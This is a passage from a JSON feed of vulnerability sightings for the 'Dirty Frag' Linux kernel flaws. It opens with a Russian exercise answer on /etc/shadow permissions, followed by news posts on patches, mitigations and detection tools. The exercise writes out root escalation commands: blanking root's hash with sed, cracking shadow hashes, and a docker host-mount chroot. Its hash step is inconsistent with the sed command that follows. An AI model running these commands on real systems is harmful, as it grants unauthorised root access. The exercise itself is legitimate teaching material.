\u0431\u044b \u043f\u0443\u0441\u0442\u044b\u0435 group-\u0431\u0438\u0442\u044b \u0438 \u0434\u0430\u043b\u0430 \u0431\u044b \u0434\u043e\u0441\u0442\u0443\u043f. \u0423\u0441\u043b\u043e\u0432\u0438\u0435 \u0437\u0430\u0434\u0430\u0447\u0438 ACL \u043d\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442 \u2014 \u0441\u0447\u0438\u0442\u0430\u0435\u043c, \u0447\u0442\u043e \u0438\u0445 \u043d\u0435\u0442. \u041d\u0430 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c `getfacl /etc/shadow`.\n\n\u041e\u0433\u043e\u0432\u043e\u0440\u043a\u0430 \u043f\u0440\u043e \u0432\u0435\u043a\u0442\u043e\u0440 \u043c\u0438\u043c\u043e /etc/shadow. \u0412\u044b\u0432\u043e\u0434 \"\u0447\u0435\u0440\u0435\u0437 \u044d\u0442\u0438 \u043f\u0440\u0430\u0432\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c root \u043d\u0435\u043b\u044c\u0437\u044f\" \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u0435\u043d \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f DAC-\u043f\u043b\u043e\u0441\u043a\u043e\u0441\u0442\u0438. \u041d\u0430 \u0443\u0440\u043e\u0432\u043d\u0435 \u044f\u0434\u0440\u0430 7-8 \u043c\u0430\u044f 2026 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d Dirty Frag \u2014 \u0441\u0432\u044f\u0437\u043a\u0430 CVE-2026-43284 (esp4/esp6) \u0438 CVE-2026-43500 (rxrpc): in-place decryption fast paths \u0434\u0435\u043a\u0440\u0438\u043f\u0442\u0443\u044e\u0442 \u043f\u043e\u0432\u0435\u0440\u0445 paged-\u0444\u0440\u0430\u0433\u043c\u0435\u043d\u0442\u043e\u0432 skb, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0435\u0449\u0451 \u0434\u0435\u0440\u0436\u0438\u0442 \u0441\u0441\u044b\u043b\u043a\u0443, \u0447\u0442\u043e \u0434\u0430\u0451\u0442 write \u043f\u043e kernel-side \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430\u043c \u0438 LPE \u0434\u043e root \u043e\u0434\u043d\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439 \u043d\u0430 \u0432\u0441\u0435\u0445 major distros (Ubuntu, RHEL, AlmaLinux, CloudLinux). \u0420\u0435\u0433\u0440\u0435\u0441\u0441\u0438\u044f \u0432 xfrm-ESP \u0441 2017, \u0432 RxRPC \u0441 2023. \u041d\u0430 8 \u043c\u0430\u044f \u043f\u0430\u0442\u0447 \u0432\u044b\u0448\u0435\u043b \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 43284, \u043d\u0430 43500 \u2014 \u043d\u0435\u0442; \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u0430\u044f \u043c\u0438\u0442\u0438\u0433\u0430\u0446\u0438\u044f \u2014 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u043c\u043e\u0434\u0443\u043b\u0435\u0439 (`/etc/modprobe.d/dirtyfrag.conf` \u0441 `install esp4|esp6|rxrpc /bin/false` \u0438 `rmmod`). \u041a \u0443\u0441\u043b\u043e\u0432\u0438\u044e \u0437\u0430\u0434\u0430\u0447\u0438 \u044d\u0442\u043e \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u043c\u043e \u0432 \u0442\u043e\u043c \u0441\u043c\u044b\u0441\u043b\u0435, \u0447\u0442\u043e \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0441 \u0448\u0435\u043b\u043b\u043e\u043c user \u0431\u0435\u0437\u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b group-\u0431\u0438\u0442\u044b shadow \u2014 \u043e\u043d \u0431\u0435\u0440\u0451\u0442 root \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0447\u0435\u0440\u0435\u0437 \u044f\u0434\u0440\u043e.\n\n\u0417\u0430\u0434\u0430\u0447\u0430 2\n\u0423\u0441\u043b\u043e\u0432\u0438\u0435: \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c user, \u0433\u0440\u0443\u043f\u043f\u044b user cdrom vboxusers docker, \u0444\u0430\u0439\u043b /etc/shadow, \u043f\u0440\u0430\u0432\u0430 -rw----rw-, \u0432\u043b\u0430\u0434\u0435\u043b\u0435\u0446 root, \u0433\u0440\u0443\u043f\u043f\u0430 adm.\n\n\u041f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u043a user:\n- \u0412\u043b\u0430\u0434\u0435\u043b\u0435\u0446? \u041d\u0435\u0442.\n- \u0412 \u0433\u0440\u0443\u043f\u043f\u0435 adm? \u041d\u0435\u0442, \u0432 \u0441\u043f\u0438\u0441\u043a\u0435 \u0433\u0440\u0443\u043f\u043f \u0435\u0451 \u043d\u0435\u0442.\n- \u041f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f other-\u0431\u0438\u0442\u044b: rw- \u2192 \u0447\u0442\u0435\u043d\u0438\u0435 \u0438 \u0437\u0430\u043f\u0438\u0441\u044c \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u044b.\n\n\u0414\u043e\u043f\u0443\u0449\u0435\u043d\u0438\u0435: \u043d\u0430 /etc/shadow \u043d\u0435\u0442 POSIX ACL. Named-user ACL `user:user:---` \u0432\u044b\u0447\u0438\u0441\u043b\u044f\u043b\u0430\u0441\u044c \u0431\u044b \u0440\u0430\u043d\u044c\u0448\u0435 other \u0438 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0431\u044b \u0434\u043e\u0441\u0442\u0443\u043f. \u041c\u0430\u0441\u043a\u0430 (ACL_MASK) \u043d\u0430 other \u043d\u0435 \u0432\u043b\u0438\u044f\u0435\u0442 \u2014 \u043c\u0430\u0441\u043a\u0430 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043a named-user, owning-group \u0438 named-group entries. \u0423\u0441\u043b\u043e\u0432\u0438\u0435 \u0437\u0430\u0434\u0430\u0447\u0438 ACL \u043d\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442 \u2014 \u0441\u0447\u0438\u0442\u0430\u0435\u043c, \u0447\u0442\u043e \u0438\u0445 \u043d\u0435\u0442. \u041d\u0430 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c `getfacl /etc/shadow`.\n\n\u041e\u0442\u0432\u0435\u0442: \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u043c\u043e\u0436\u043d\u043e, \u043f\u0440\u0438\u0447\u0451\u043c \u0434\u0432\u0443\u043c\u044f \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u044b\u043c\u0438 \u043f\u0443\u0442\u044f\u043c\u0438\n\n\u041f\u0443\u0442\u044c 1 \u2014 \u0447\u0435\u0440\u0435\u0437 \u043f\u0440\u0430\u0432\u0430 \u043d\u0430 /etc/shadow. \u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u043f\u043e\u043b\u0435 \u0445\u0435\u0448\u0430 root:\n1. \u0421\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0445\u0435\u0448: openssl passwd -6 'NewPass'\n2. \u041f\u043e\u0434\u043c\u0435\u043d\u0438\u0442\u044c \u0445\u0435\u0448: sed -i \"s|^root:[^:]*:|root::|\" /etc/shadow\n3. su - \u0438 \u0432\u043e\u0439\u0442\u0438 \u043f\u043e\u0434 root \u0441 \u0437\u0430\u0434\u0430\u043d\u043d\u044b\u043c \u043f\u0430\u0440\u043e\u043b\u0435\u043c\n\u0410\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u0430 \u2014 \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c shadow, \u0441\u043a\u043b\u0435\u0438\u0442\u044c unshadow \u0441 /etc/passwd \u0438 \u043a\u0440\u044d\u043a\u043d\u0443\u0442\u044c john/hashcat (\u0442\u0438\u0448\u0435, \u0431\u0435\u0437 \u0437\u0430\u043f\u0438\u0441\u0438)\n\n\u041f\u0443\u0442\u044c 2 \u2014 \u0447\u0435\u0440\u0435\u0437 \u0433\u0440\u0443\u043f\u043f\u0443 docker. \u0427\u043b\u0435\u043d\u0441\u0442\u0432\u043e \u0432 docker \u044d\u043a\u0432\u0438\u0432\u0430\u043b\u0435\u043d\u0442\u043d\u043e root: \u0434\u0435\u043c\u043e\u043d \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043e\u0442 root, \u043b\u044e\u0431\u043e\u0439 \u0447\u043b\u0435\u043d \u0433\u0440\u0443\u043f\u043f\u044b \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0438\u043c \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u043a\u0435\u0442. \u041a\u043e\u043c\u0430\u043d\u0434\u0430 docker run --rm -it -v /:/mnt alpine chroot /mnt sh \u0434\u0430\u0451\u0442 root-\u0448\u0435\u043b\u043b \u043d\u0430 \u0445\u043e\u0441\u0442\u0435 \u0431\u0435\u0437 \u043a\u0430\u0441\u0430\u043d\u0438\u044f /etc/shadow.\n\n\u0418\u0442\u043e\u0433: \u0432 \u0437\u0430\u0434\u0430\u0447\u0435 2 \u044d\u0441\u043a\u0430\u043b\u0430\u0446\u0438\u044f \u0442\u0440\u0438\u0432\u0438\u0430\u043b\u044c\u043d\u0430 \u043a\u0430\u043a \u043c\u0438\u043d\u0438\u043c\u0443\u043c \u0434\u0432\u0443\u043c\u044f \u0441\u043f\u043e\u0441\u043e\u0431\u0430\u043c\u0438.\n", "creation_timestamp": "2026-05-10T17:36:51.000000Z"}, {"uuid": "8746c2d9-6134-4649-a0f5-9fc2f7454455", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mljr5rhd6i22", "content": "Dirty Frag (CVE-2026-43284, CVE-2026-43500): Frequently asked questions about this Linux kernel privilege escalation vulnerability chain Weeks after the Copy Fail vulnerability was revealed, a new ...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-10T22:02:05.829577Z"}, {"uuid": "dd2b415a-c654-4068-9568-ee5f825f1e16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/securitylab-jp.bsky.social/post/3mljujvcrks2a", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027 Dirty Frag\u3067root\u596a\u53d6\u304c\u53ef\u80fd(CVE-2026-43284\u30fbCVE-2026-43500)\n\nrocket-boys.co.jp/security-mea...\n\n#\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u5bfe\u7b56Lab #security #securitynews", "creation_timestamp": "2026-05-10T23:02:32.169777Z"}, {"uuid": "3e0a8ccc-4080-4cfc-bde5-bbc4e36355b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mlk7psdid6r2", "content": "Dirty Frag (CVE-2026-43284, CVE-2026-43500): Mitigation and Kernel Update on CloudLinux A week after Copy Fail (CVE-2026-31431), researcher Hyunwoo Kim disclosed a second Linux kernel local privil...\n\n#KernelCare #CVE #Vulnerability #Kernel #Update #AlmaLinux #CloudLinux\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-11T02:22:41.621990Z"}, {"uuid": "b7727347-729f-4cea-bbe5-0cc83d7055e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlka652tl522", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 141 interactions\nCVE-2026-43284: 122 interactions\nCVE-2026-43500: 84 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-42511: 56 interactions\nCVE-2024-13362: 4 interactions\nCVE-2026-29201: 3 interactions\n", "creation_timestamp": "2026-05-11T02:30:39.352628Z"}, {"uuid": "a4fe39b7-b5a3-4ae9-95f4-a3f471e7c930", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/Linux-Maintainers.activitypub.awakari.com.ap.brid.gy/post/3mleiuxfnowo2", "content": "AL26-011 - Vulnerabilities affecting Linux - CVE-2026-43284 and CVE-2026-43500 Introduction to Malware Binary Triage (IMBT) Course Looking to level up your skills? Get 10% off using coupon code: MW...\n\n#Malware #News\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-08T19:50:39.591563Z"}, {"uuid": "47b61115-e966-4893-afa1-7f2d2e8c470f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3mlekajztdm2e", "content": "~Cybergcca~\nAlert on unpatched Linux LPE flaws (Dirty Frag) with active PoCs, plus Edge & cPanel updates.\n-\nIOCs: CVE-2026-43284, CVE-2026-43500\n-\n#Linux #ThreatIntel #Vulnerability", "creation_timestamp": "2026-05-08T20:14:58.760346Z"}, {"uuid": "ddeecb7b-db90-4ab0-8aff-a66fa7ba053f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/mel-echosphere.bsky.social/post/3mlene27n652h", "content": "\u4f55\u304c\u8d77\u304d\u308b\u304b\u3002\n\n\u30ed\u30b0\u30a4\u30f3\u3057\u3066\u3044\u308b\u4e00\u822c\u30e6\u30fc\u30b6\u30fc\u304c\u3001\u7ba1\u7406\u8005\u6a29\u9650\u3092\u596a\u3048\u308b\u3002\u30bf\u30a4\u30df\u30f3\u30b0\u306e\u904b\u3082\u8981\u3089\u306a\u3044\u2014\u2014\u78ba\u5b9f\u306b\u52d5\u304f\u3002\n\n\u901a\u4fe1\u6697\u53f7\u51e6\u7406\u306e\u5185\u90e8\u3067\u3001\u4ed6\u4eba\u306e\u30e1\u30e2\u30ea\u9818\u57df\u306b\u76f4\u63a5\u66f8\u304d\u8fbc\u3093\u3067\u3057\u307e\u3046\u69cb\u9020\u4e0a\u306e\u6b20\u9665\u30022017\u5e74\u306e\u30b3\u30fc\u30c9\u5909\u66f4\u304b\u30899\u5e74\u9593\u3001\u6c17\u3065\u304b\u308c\u306a\u3044\u307e\u307e\u6b8b\u3063\u3066\u3044\u305f\u3002\ud83d\udd4a\ufe0f\n\nCVE-2026-43284 \u306f\u4fee\u6b63\u6e08\u307f\u3002CVE-2026-43500 \u306f\u4fee\u6b63\u306a\u3057\u3002\n\nDirty Pipe \u2192 Copy Fail \u2192 Dirty Frag\u3002\u540c\u3058\u7a2e\u985e\u306e\u7a74\u304c\u4e16\u4ee3\u3092\u8d8a\u3048\u3066\u62e1\u304c\u3063\u3066\u3044\u308b\u3002\u4e00\u3064\u585e\u3044\u3067\u3082\u3001\u540c\u3058\u4ed5\u7d44\u307f\u3067\u7d44\u307e\u308c\u305f\u5225\u306e\u7d4c\u8def\u304b\u3089\u6765\u308b\u3002", "creation_timestamp": "2026-05-08T21:10:37.192059Z"}, {"uuid": "601b31b4-bbe3-4b96-96d2-ff36b440c850", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mlenmpi3zb2z", "content": "DirtyFrag exploits two Linux kernel bugs, CVE-2026-43284 and CVE-2026-43500, enabling local root access on major distros including Ubuntu, RHEL, Fedora, CentOS Stream, AlmaLinux, and openSUSE. #LinuxRoot #KernelExploit #USA", "creation_timestamp": "2026-05-08T21:15:28.771348Z"}, {"uuid": "5fb5f327-2c4e-4345-9897-d1461d08e967", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mleq4zjrfm2s", "content": "Two Linux kernel vulnerabilities, CVE-2026-43284 and CVE-2026-43500 (Dirty Frag), enable local users to escalate privileges by overwriting page cache across many distros. Monitoring ESP and RxRPC recommended. #LinuxKernel #RootAccess #USA", "creation_timestamp": "2026-05-08T22:00:23.546730Z"}, {"uuid": "4c0bfaf6-c9ee-48fe-9a57-e42078a7463d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/dragostech.bsky.social/post/3mler7ebhyc26", "content": "\"Dirty Frag\" clickbait update: ESP (CVE-2026-43284) patched in mainline + stable (7.0.5, 6.18.28, 6.12.87, 6.6.138, 6.1.171). RxRPC (CVE-2026-43500) still unpatched upstream. AWS adds ipcomp4/ipcomp6 to the blacklist alongside esp4/esp6/rxrpc. AlmaLinux shipped both. Ubuntu/Debian mitigation only.", "creation_timestamp": "2026-05-08T22:20:51.396533Z"}, {"uuid": "d80dfe3e-9237-4455-993b-57e29c665d75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/ruari.velocipederider.com.ap.brid.gy/post/3mlkroxxmpot2", "content": "I upgraded my kernel for Copy Fail (CVE-2026-31431) not that long ago.\n\nNow I am upgrading again for Dirty Frag (CVE-2026-43284 and CVE-2026-43500).\n\nI hope things clam down a bit now but I guess we shall see\u2026", "creation_timestamp": "2026-05-11T07:47:08.360320Z"}, {"uuid": "c02ca508-6aa8-4deb-8f10-97d8475fe18a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mlktlos7p3y2", "content": "New \u2018Dirty Frag\u2019 Linux Vulnerability Possibly Exploited in Attacks Also called Copy Fail 2 and tracked as CVE-2026-43284 and CVE-2026-43500, the exploit was disclosed before a patch was release...\n\n#Endpoint #Security #Vulnerabilities #Dirty #Frag #Linux [\u2026] \n\n[Original post on securityweek.com]", "creation_timestamp": "2026-05-11T08:18:58.723113Z"}, {"uuid": "f7d67cc4-4b95-44ab-aa32-40a53ca85c4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/83847", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a DirtyFrag-Detector\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a liamromanis101\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-11 19:54:21\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43284/CVE-2026-43500 'DirtyFrag' Benign patch & mitigation detection script\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-11T20:00:04.000000Z"}, {"uuid": "cd8dabe1-ef45-4567-ab0e-33c8f543d551", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mlkvz67xn5b2", "content": "New \u2018Dirty Frag\u2019 Linux Vulnerability Possibly Exploited in Attacks Also called Copy Fail 2 and tracked as CVE-2026-43284 and CVE-2026-43500, the exploit was disclosed before a patch was release...\n\n#Endpoint #Security #Vulnerabilities #Dirty #Frag #Featured [\u2026] \n\n[Original post on securityweek.com]", "creation_timestamp": "2026-05-11T09:01:37.430518Z"}, {"uuid": "d4fed6c5-e999-46d8-9c3f-081874acd533", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mlkvza6vwp32", "content": "New \u2018Dirty Frag\u2019 Linux Vulnerability Possibly Exploited in Attacks Also called Copy Fail 2 and tracked as CVE-2026-43284 and CVE-2026-43500, the exploit was disclosed before a patch was release...\n\n#Endpoint #Security #Vulnerabilities #Dirty #Frag #Featured [\u2026] \n\n[Original post on securityweek.com]", "creation_timestamp": "2026-05-11T09:01:48.018540Z"}, {"uuid": "683ff717-aa37-4f44-956c-3069f98b8f3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "Telegram/Yr-1pp_OQlsAxCk9olefEOIlRJklCfDEolOYJn0mNy08hY4", "content": "", "creation_timestamp": "2026-05-09T09:00:04.000000Z"}, {"uuid": "5af80ec5-a705-4bb4-a154-72915a23f234", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43500", "type": "seen", "source": "https://social.tchncs.de/users/gborn/statuses/116556150150224566", "content": "Dirty Frag Schwachstelle in Linux erm\u00f6glicht lokale Rechteausweitung\nhttps://borncity.com/blog/2026/05/09/dirty-frag-lokale-rechteausweitung-im-linux-kernel-cve-2026-43284-cve-2026-43500/", "creation_timestamp": "2026-05-11T13:21:50.861010Z"}, {"uuid": "ea8d3aa8-ea19-4ad2-b2f0-a591c2f7395b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mllgamqquta2", "content": "Two stable kernels with Dirty Frag fixes Greg Kroah-Hartman has released the 7.0.6 and 6.18.29 stable kernels with Hyunwoo Kim's patch for the second vulnerability ( CVE-2026-43500 ) reported w...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-11T13:52:26.914516Z"}, {"uuid": "9f4f967b-4ecd-44a1-bca1-b0f6f33f76d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/news.karthihegde.dev/post/3mllpeyrv4s2j", "content": "Load-Bearing Assumptions: the rxrpc case (CVE-2026-43500) and the constraint that was never there\nDiscussion | lobsters | Author: fro", "creation_timestamp": "2026-05-11T16:35:39.861682Z"}, {"uuid": "ebd25b75-cc8b-4cff-ac23-080a2f8d908c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/lobsters-feed.bsky.social/post/3mllq6vsbtk2g", "content": "Load-Bearing Assumptions: the rxrpc case (CVE-2026-43500) and the constraint that was never there https://lobste.rs/s/tuiapt #security #linux ", "creation_timestamp": "2026-05-11T16:50:04.610734Z"}, {"uuid": "cba14dc1-4b14-466b-a5d3-2d87d564bbe9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/cybergeodigest.bsky.social/post/3mll3k22l4g2s", "content": "Today's CyberGeoDigest \u2014 9 stories\n\nTop: Dirty Frag Linux Flaws CVE-2026-43284 and CVE-2026-43500 Exploited Before Patch\n\n#InfoSec #CVE #CyberSecurity", "creation_timestamp": "2026-05-11T10:41:20.558084Z"}, {"uuid": "b5ed169c-587d-4af9-89fb-48c9525082a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mll3pftazom2", "content": "Today's CyberGeoDigest \u2014 9 stories Top: Dirty Frag Linux Flaws CVE-2026-43284 and CVE-2026-43500 Exploited Before Patch #InfoSec #CVE #CyberSecurity\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-11T10:43:38.735053Z"}, {"uuid": "f7d9bb71-4d34-4878-9730-f0296b123b8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mll3uiaiym2t", "content": "CVE-2026-43500 - rxrpc: Also unshare DATA/RESPONSE packets when paged frags are present\nCVE ID : CVE-2026-43500\n \n Published : May 11, 2026, 8:16 a.m. | 2\u00a0hours, 14\u00a0minutes ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\nrxrpc: Also un...", "creation_timestamp": "2026-05-11T10:46:19.822871Z"}, {"uuid": "c93642a5-1596-451e-b015-fd625e2919ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/83783", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a vcheck\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a krisiasty\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 2 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-11 09:35:59\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nVulnerability detection and mitigation tool for Copy Fail and Dirty Frag bugs (CVE-2026-31431, CVE-2026-43284, CVE-2026-43500)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-11T10:00:04.000000Z"}, {"uuid": "eed9c7aa-138b-486a-99b6-17c5e5d54832", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/information_security_channel/55241", 